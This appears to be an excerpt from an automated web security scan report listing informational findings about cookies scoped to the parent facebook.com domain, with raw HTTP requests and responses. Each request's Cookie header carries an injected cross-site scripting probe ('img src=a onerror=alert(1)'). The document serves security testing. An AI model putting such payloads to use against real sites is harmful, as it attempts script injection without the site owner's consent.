X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HuffPost-World/70242384902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0

10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Manchester-Connecticut/112527912096312

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Merchandiser/123981654314779

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/New-Haven-College/130105783687523

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Northern-Illinois-University/108155335871674

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/San-Antonio-Texas/110297742331680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Sporting-News/104068362964496

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.75. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.77. http://www.facebook.com/patroyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0

10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
